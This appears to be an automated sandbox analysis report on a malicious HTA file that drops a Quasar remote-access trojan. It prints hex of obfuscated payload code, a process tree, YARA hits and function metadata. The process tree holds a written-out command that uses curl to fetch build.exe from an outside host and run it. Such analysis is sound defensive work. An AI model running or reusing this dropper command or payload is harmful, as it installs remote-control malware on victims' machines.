2024-06-08 23:26:07 UTC	1369	IN	Data Raw: ea ff ff 0f af 45 d4 6b 55 d4 70 2b c2 89 45 d0 8b 85 64 ea ff ff 0f af 45 d4 89 85 d8 e1 ff ff c7 85 d8 e9 ff ff 01 00 00 00 56 56 83 c4 04 81 f6 68 72 00 00 5e 52 81 ca d0 66 00 00 5a 56 57 83 c4 04 81 ce f7 60 01 00 81 c6 1a e6 00 00 81 ee ad 1b 00 00 81 ce 26 23 01 00 5e 6b 8d d8 e9 ff ff 70 81 c1 3b 66 f3 44 6b 95 d8 e9 ff ff 70 2b ca 33 8d d8 e1 ff ff 0f af 8d d8 e9 ff ff 6b 85 d8 e9 ff ff 70 2b c8 89 8d d4 e9 ff ff 8b 8d 9c ef ff ff 8b 95 a0 ef ff ff 89 8d cc e9 ff ff 89 95 d0 e9 ff ff 52 eb 03 4f 3b 4d 81 f2 66 59 00 00 5a 50 53 83 c4 04 e8 0b 00 00 00 00 38 4a 3e 49 37 3f 3b 37 45 41 83 c4 04 81 e8 84 4c 00 00 81 e0 b3 04 01 00 58 56 81 f6 ad 04 01 00 e8 0b 00 00 00 00 3c 3c 46 36 37 36 4e 43 3f 4d 83 c4 04 5e 51 eb 07 4d 36 48 43 3e 4b 4f 59 52 Data Ascii: EkUp+EdEVVhr^RfZVW`&#^kp;fDkp+3kp+RO;MfYZPS8J>I7?;7EALXV<<F676NC?M^QM6HC>KOYR
2024-06-08 23:26:07 UTC	1369	IN	Data Raw: e8 09 00 00 00 00 3d 46 48 41 39 4d 3e 43 83 c4 04 5e 6b 95 c8 e9 ff ff 70 81 c2 3b 66 f3 44 6b 85 c8 e9 ff ff 70 2b d0 81 f2 e6 00 00 00 0f af 95 c8 e9 ff ff 6b 8d c8 e9 ff ff 70 2b d1 89 95 c4 e9 ff ff 53 50 83 c4 04 81 eb dc 78 01 00 81 c3 f0 7e 01 00 81 eb b5 10 01 00 81 c3 d6 0d 00 00 5b 56 81 ee 9a 48 01 00 81 ce e1 64 00 00 81 c6 50 c8 00 00 5e 56 51 83 c4 04 81 c6 81 38 00 00 eb 04 3e 42 36 45 5e 50 52 83 c4 04 81 c0 c5 62 01 00 81 e0 d9 8a 00 00 81 c8 ef 1a 01 00 58 52 81 ca b1 01 00 00 5a 8b 95 54 f6 ff ff 83 c2 70 6b 85 58 f6 ff ff 70 05 3b 66 f3 44 6b 8d 58 f6 ff ff 70 2b c1 33 d0 0f af 95 58 f6 ff ff 89 95 b0 e1 ff ff 8b 95 b0 e1 ff ff 89 95 ac e1 ff ff 8b 85 ac e1 ff ff 83 e8 6e 89 85 a4 e1 ff ff c7 85 8c f5 ff ff 01 00 00 00 51 e8 07 00 00 Data Ascii: =FHA9M>C^kp;fDkp+kp+SPx~[VHdP^VQ8>B6E^PRbXRZTpkXp;fDkXp+3XnQ
2024-06-08 23:26:07 UTC	1369	IN	Data Raw: ff 70 81 c2 3b 66 f3 44 6b 85 8c fd ff ff 70 2b d0 33 ca 0f af 8d 8c fd ff ff 89 8d 8c e1 ff ff 8b 8d 8c e1 ff ff 89 8d 88 e1 ff ff 83 bd 88 e1 ff ff 00 0f 86 af 04 00 00 53 81 f3 12 7e 01 00 81 e3 63 dd 00 00 eb 06 38 40 4c 4f 41 33 81 f3 81 00 01 00 5b 50 81 c8 e5 5e 01 00 58 51 81 f1 a9 67 01 00 81 c1 bf c4 00 00 59 8b 95 88 fd ff ff 83 c2 70 6b 85 8c fd ff ff 70 05 3b 66 f3 44 6b 8d 8c fd ff ff 70 2b c1 33 d0 0f af 95 8c fd ff ff 89 95 84 e1 ff ff 8b 95 84 e1 ff ff 89 95 78 e1 ff ff 50 81 c8 e4 02 01 00 81 e8 5b 82 00 00 58 56 51 83 c4 04 81 c6 f5 4e 00 00 81 e6 50 21 00 00 81 f6 4a 6a 00 00 5e 50 57 83 c4 04 81 e8 ed 35 01 00 58 8b 85 88 f5 ff ff 83 c0 70 6b 8d 8c f5 ff ff 70 81 c1 3b 66 f3 44 6b 95 8c f5 ff ff 70 2b ca 33 c1 0f af 85 8c f5 ff ff 89 Data Ascii: p;fDkp+3S~c8@LOA3[P^XQgYpkp;fDkp+3xP[XVQNP!Jj^PW5Xpkp;fDkp+3
2024-06-08 23:26:07 UTC	1369	IN	Data Raw: 04 e8 0b 00 00 00 00 46 3f 3a 3c 39 3d 32 35 46 3c 83 c4 04 59 56 eb 04 45 48 50 40 81 ee 47 7f 00 00 5e 8b 95 30 f5 ff ff 8b 02 83 c0 70 8b 8d 30 f5 ff ff 6b 51 04 70 81 c2 3b 66 f3 44 8b 8d 30 f5 ff ff 6b 49 04 70 2b d1 33 c2 8b 95 30 f5 ff ff 0f af 42 04 89 85 48 e1 ff ff 8b 85 48 e1 ff ff 89 85 40 e1 ff ff 8b 8d 44 e1 ff ff 2b 8d 40 e1 ff ff 89 8d 3c e1 ff ff c7 85 80 ef ff ff 01 00 00 00 52 50 83 c4 04 81 c2 86 c3 00 00 eb 07 34 33 35 37 48 3a 34 5a 50 52 83 c4 04 81 e8 de 9d 00 00 e8 09 00 00 00 00 4c 38 37 43 36 48 4b 35 83 c4 04 58 6b 95 80 ef ff ff 70 81 c2 3b 66 f3 44 6b 85 80 ef ff ff 70 2b d0 33 95 3c e1 ff ff 0f af 95 80 ef ff ff 6b 8d 80 ef ff ff 70 2b d1 89 95 7c ef ff ff 8b 95 7c ef ff ff 8b 85 80 ef ff ff 89 55 ec 89 45 f0 53 50 83 c4 04 Data Ascii: F?:<9=25F<YVEHP@G^0p0kQp;fD0kIp+30BHH@D+@<RP4357H:4ZPRL87C6HK5Xkp;fDkp+3<kp+\|\|UESP
2024-06-08 23:26:07 UTC	1369	IN	Data Raw: 56 81 e6 c5 31 01 00 5e 50 81 e8 9b 62 01 00 81 e0 05 67 01 00 81 e8 e0 f8 00 00 81 c0 e9 75 01 00 58 53 50 83 c4 04 81 e3 88 41 00 00 81 c3 d6 86 00 00 81 cb 1d 79 01 00 5b c7 85 18 fd ff ff 01 00 00 00 56 50 83 c4 04 81 c6 a6 61 01 00 5e 57 52 83 c4 04 81 c7 c3 9c 00 00 81 e7 93 47 01 00 5f 52 81 ca 20 ce 00 00 81 e2 10 d3 00 00 81 ca b3 9a 00 00 5a 6b 8d 18 fd ff ff 70 81 c1 3b 66 f3 44 6b 95 18 fd ff ff 70 2b ca 83 f1 02 0f af 8d 18 fd ff ff 6b 85 18 fd ff ff 70 2b c8 89 8d 14 fd ff ff 51 eb 04 3e 49 44 43 59 52 53 83 c4 04 81 ea 7b c8 00 00 81 c2 9e 07 01 00 5a 52 51 83 c4 04 81 f2 ef dd 00 00 81 c2 d5 a9 00 00 81 ca b5 9a 00 00 5a 8b 8d 4c f6 ff ff 8b 95 50 f6 ff ff 89 8d 90 fd ff ff 89 95 94 fd ff ff e9 b8 01 00 00 51 56 83 c4 04 81 c9 64 39 01 00 Data Ascii: V1^PbguXSPAy[VPa^WRG_R Zkp;fDkp+kp+Q>IDCYRS{ZRQZLPQVd9
2024-06-08 23:26:07 UTC	1369	IN	Data Raw: 3a 42 3d 42 35 83 c4 04 e8 0a 00 00 00 00 41 4c 44 3f 33 44 38 4d 32 83 c4 04 81 e2 34 60 01 00 5a 50 e8 0b 00 00 00 00 3e 35 41 48 4e 34 4d 4f 3b 47 83 c4 04 81 e8 d3 20 00 00 81 f0 f1 f7 00 00 58 56 81 ee fd 77 01 00 eb 07 45 3e 4e 4f 40 3c 40 5e 8b 8d 90 fd ff ff 83 c1 70 6b 95 94 fd ff ff 70 81 c2 3b 66 f3 44 6b 85 94 fd ff ff 70 2b d0 33 ca 0f af 8d 94 fd ff ff 89 8d f0 e0 ff ff 8b 8d f0 e0 ff ff 89 8d e4 e0 ff ff 56 50 83 c4 04 e8 0a 00 00 00 00 40 39 4a 39 4a 3d 4c 39 49 83 c4 04 5e 53 81 e3 d6 2d 01 00 81 c3 5b 08 01 00 81 eb a0 85 01 00 81 cb 9d 66 00 00 5b 8b 95 70 f5 ff ff 83 c2 70 6b 85 74 f5 ff ff 70 05 3b 66 f3 44 6b 8d 74 f5 ff ff 70 2b c1 33 d0 0f af 95 74 f5 ff ff 89 95 ec e0 ff ff 8b 95 ec e0 ff ff 89 95 e8 e0 ff ff 8b 85 4c ea ff ff 0f Data Ascii: :B=B5ALD?3D8M24`ZP>5AHN4MO;G XVwE>NO@<@^pkp;fDkp+3VP@9J9J=L9I^S-[f[ppktp;fDktp+3tL
2024-06-08 23:26:07 UTC	1369	IN	Data Raw: ff ff 70 2b d1 89 95 5c ef ff ff 8b 95 5c ef ff ff 8b 85 60 ef ff ff 89 55 ec 89 45 f0 56 52 83 c4 04 81 ce 07 7e 00 00 81 e6 06 39 00 00 81 e6 1b 9a 00 00 81 ee 44 40 00 00 5e 52 81 e2 f8 39 00 00 81 e2 28 72 01 00 81 e2 6a b7 00 00 5a 57 81 cf 5d fb 00 00 eb 05 39 44 4e 4c 4d e8 0a 00 00 00 00 42 41 4e 36 33 4f 4b 46 40 83 c4 04 e8 09 00 00 00 00 4f 43 3f 3f 46 40 38 35 83 c4 04 5f 8b 4d d0 83 c1 70 6b 55 d4 70 81 c2 3b 66 f3 44 6b 45 d4 70 2b d0 33 ca 0f af 4d d4 89 8d ac e0 ff ff 8b 8d ac e0 ff ff 89 8d a8 e0 ff ff 81 bd a8 e0 ff ff e7 09 00 00 0f 85 c1 0e 00 00 56 81 ee cc c5 00 00 eb 04 49 41 39 4e 81 ce 60 07 00 00 5e 57 52 83 c4 04 81 ef e9 12 00 00 e8 0a 00 00 00 00 44 34 4e 3a 4a 4f 3c 46 3a 83 c4 04 5f 56 81 e6 99 af 00 00 81 e6 d4 63 00 00 5e Data Ascii: p+\\`UEVR~9D@^R9(rjZW]9DNLMBAN63OKF@OC??F@85_MpkUp;fDkEp+3MVIA9N`^WRD4N:JO<F:_Vc^
2024-06-08 23:26:07 UTC	1369	IN	Data Raw: ff 89 8d 88 e0 ff ff 8b 8d 88 e0 ff ff 89 8d 84 e0 ff ff 8b 95 84 e0 ff ff 83 c2 38 89 95 80 e0 ff ff c7 85 08 f5 ff ff 01 00 00 00 53 57 83 c4 04 81 cb 87 82 01 00 5b 50 56 83 c4 04 81 f0 8b fe 00 00 58 52 81 c2 9c 0c 01 00 81 ea 1f 64 00 00 81 ea 37 69 01 00 81 e2 89 fa 00 00 5a 6b 85 08 f5 ff ff 70 05 3b 66 f3 44 6b 8d 08 f5 ff ff 70 2b c1 33 85 80 e0 ff ff 0f af 85 08 f5 ff ff 6b 95 08 f5 ff ff 70 2b c2 89 85 04 f5 ff ff 53 56 83 c4 04 eb 05 4e 44 42 3c 34 81 f3 4e 24 00 00 5b 52 50 83 c4 04 eb 05 37 35 34 36 43 81 ca 75 27 00 00 81 c2 f4 b7 00 00 81 ca 69 54 01 00 5a 53 51 83 c4 04 81 f3 23 a9 00 00 81 e3 47 22 00 00 5b 56 51 83 c4 04 81 e6 a7 f3 00 00 81 e6 39 2c 00 00 81 ce f7 7d 01 00 eb 06 3f 46 4a 4b 47 41 5e c7 85 20 fd ff ff 01 00 00 00 56 81 Data Ascii: 8SW[PVXRd7iZkp;fDkp+3kp+SVNDB<4N$[RP7546Cu'iTZSQ#G"[VQ9,}?FJKGA^ V

Target ID:	0
Start time:	19:26:05
Start date:	08/06/2024
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\build.hta"
Imagebase:	0xac0000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	19:26:05
Start date:	08/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	19:26:05
Start date:	08/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	19:26:05
Start date:	08/06/2024
Path:	C:\Windows\SysWOW64\curl.exe
Wow64 process (32bit):	true
Commandline:	curl -L https://mediafire.zip/build.exe -o build.exe
Imagebase:	0xe0000
File size:	470'528 bytes
MD5 hash:	44E5BAEEE864F1E9EDBE3986246AB37A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	19:26:08
Start date:	08/06/2024
Path:	C:\Users\user\Desktop\build.exe
Wow64 process (32bit):	true
Commandline:	build.exe
Imagebase:	0x400000
File size:	3'124'224 bytes
MD5 hash:	05EECFC1820AB3273409323601A71F23
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: Windows_Trojan_Quasarrat_e52df647, Description: unknown, Source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, Author: unknown Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, Author: Florian Roth Rule: Quasar, Description: detect Remcos in memory, Source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Quasarrat_e52df647, Description: unknown, Source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: Quasar, Description: detect Remcos in memory, Source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 16%, ReversingLabs Detection: 20%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	19:26:35
Start date:	08/06/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Imagebase:	0x100000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Quasarrat_e52df647, Description: unknown, Source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: Quasar, Description: detect Remcos in memory, Source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	false

Show Windows behavior

Function 06960FE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1733872709.0000000006960000.00000010.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6960000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
Instruction ID: 6b15eb786b658543b5f1754be5bce9aa221c05a3a7c19c52d7b0715bbba2d7c2
Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
Instruction Fuzzy Hash:

Analysis Process: build.exePID: 7720, Parent PID: 7524COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	19.1%
Total number of Nodes:	622
Total number of Limit Nodes:	1

Executed Functions

Function 0041CABA Relevance: 42.3, APIs: 1, Strings: 23, Instructions: 298
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0041DA1D

Strings

t, xrefs: 0041EFAB
c, xrefs: 0041EFC7
r, xrefs: 0041CAF5
i, xrefs: 0041EFA4
y, xrefs: 0041CB0A
E, xrefs: 0041EF96
i, xrefs: 0041CAE7
L, xrefs: 0041CAE0
r, xrefs: 0041CB03
o, xrefs: 0041CACB
d, xrefs: 0041CAD9
s, xrefs: 0041EFD5
a, xrefs: 0041CAD2
b, xrefs: 0041CAEE
P, xrefs: 0041EFB2
W, xrefs: 0041CB11
a, xrefs: 0041CAFC
x, xrefs: 0041EF9D
r, xrefs: 0041EFB9
L, xrefs: 0041CAC4
s, xrefs: 0041EFDC
e, xrefs: 0041EFCE
o, xrefs: 0041EFC0

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
API String ID: 544645111-215400123
Opcode ID: 25ceb620cde84b9a6f9aae2053d098413eef51a21165765ed1d1780b96466641
Instruction ID: 96e07906f0b69665a99d788711513d70affac305f80943359574ecec95edf81e
Opcode Fuzzy Hash: 25ceb620cde84b9a6f9aae2053d098413eef51a21165765ed1d1780b96466641
Instruction Fuzzy Hash: 85C108B1C082689EF720CA24DC84BEABB74EB91304F1481FAD84D56681D77D5FC59F62

Function 0041CD00 Relevance: 26.8, APIs: 1, Strings: 14, Instructions: 549
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0041DA1D

Strings

t, xrefs: 0041EFAB
c, xrefs: 0041EFC7
i, xrefs: 0041EFA4
E, xrefs: 0041EF96
s, xrefs: 0041EFD5
P, xrefs: 0041EFB2
S, xrefs: 0041D306
W, xrefs: 0041D666
x, xrefs: 0041EF9D
_S, xrefs: 0041D6C5
r, xrefs: 0041EFB9
s, xrefs: 0041EFDC
e, xrefs: 0041EFCE
o, xrefs: 0041EFC0

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: E$P$S$W$_S$c$e$i$o$r$s$s$t$x
API String ID: 544645111-3000879820
Opcode ID: a571f0c90d2804b6c4b6a94c3c8824fd73f5f93a1ceecb7862db087940158e4a
Instruction ID: 884b98e7c8a569db0c5dd9b21bdebe68354a6858b6c49b710d0825530fee468d
Opcode Fuzzy Hash: a571f0c90d2804b6c4b6a94c3c8824fd73f5f93a1ceecb7862db087940158e4a
Instruction Fuzzy Hash: 0632B0B1D046689BEB24CB14DC90BEABBB5EB85304F1481FAD80D66381D7399EC2CF55

Function 0041D257 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 233
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0041DA1D

Strings

t, xrefs: 0041EFAB
c, xrefs: 0041EFC7
i, xrefs: 0041EFA4
E, xrefs: 0041EF96
s, xrefs: 0041EFD5
P, xrefs: 0041EFB2
S, xrefs: 0041D306
W, xrefs: 0041D666
x, xrefs: 0041EF9D
_S, xrefs: 0041D6C5
r, xrefs: 0041EFB9
s, xrefs: 0041EFDC
e, xrefs: 0041EFCE
o, xrefs: 0041EFC0

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: E$P$S$W$_S$c$e$i$o$r$s$s$t$x
API String ID: 544645111-3000879820
Opcode ID: 4c95bf7e24adb1db337edbd5686769632907e5f9b1fa7965824d33e121b4d76c
Instruction ID: d158561e8fbb367ccf9def83134a1f9f02d01e5a30f4799e541c6d94b93b0aa4
Opcode Fuzzy Hash: 4c95bf7e24adb1db337edbd5686769632907e5f9b1fa7965824d33e121b4d76c
Instruction Fuzzy Hash: 5381FBF1D086689FE7208A64DC44BEA7BB4EB81314F1480FBD84D56241D77D9EC68B92

Function 004166E1 Relevance: 23.1, APIs: 1, Strings: 12, Instructions: 305
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

a, xrefs: 00416838
y, xrefs: 00416870
W, xrefs: 00416877
r, xrefs: 00416869
b, xrefs: 00416854
a, xrefs: 00416862
i, xrefs: 0041684D
o, xrefs: 00416831
L, xrefs: 00416846
L, xrefs: 0041682A
d, xrefs: 0041683F
r, xrefs: 0041685B

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID:
String ID: L$L$W$a$a$b$d$i$o$r$r$y
API String ID: 0-4069139063
Opcode ID: fccae9870a50f8b9b5593d71dbc725d2ea5299f91a12f9e0e39864fbe1a573b9
Instruction ID: 4058cbc92310f8f4e43dd3c396a785fb687be82286c4d2893251167a3ad01c49
Opcode Fuzzy Hash: fccae9870a50f8b9b5593d71dbc725d2ea5299f91a12f9e0e39864fbe1a573b9
Instruction Fuzzy Hash: 7BC1CEB1D182688EE724CB24DC50BEAB7B6EF54310F0480EAD44DA7282D6799EC5CF56

Function 00417331 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PLDE, xrefs: 0041733B
K7N:, xrefs: 0041734A

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: DefaultLocaleQuery
String ID: K7N:$PLDE
API String ID: 2949231068-2424058915
Opcode ID: 4ebc055a304ce616f70e28154787af76ea51a2690bc9e884b9a633f01ff7cea9
Instruction ID: ffd5ec5ae0d17dccbe4aed31b7c5ac12f54083616d1aa68df9d8a4f299ec2e9b
Opcode Fuzzy Hash: 4ebc055a304ce616f70e28154787af76ea51a2690bc9e884b9a633f01ff7cea9
Instruction Fuzzy Hash: E321C5B2D146288FE729DE10DC61BEA7B78EB94710F1444FED40D96382D238AEC68F41

Function 004169D2 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 421COMMON

Download Yara Rule

Strings

I@6H, xrefs: 004169CB

Memory Dump Source

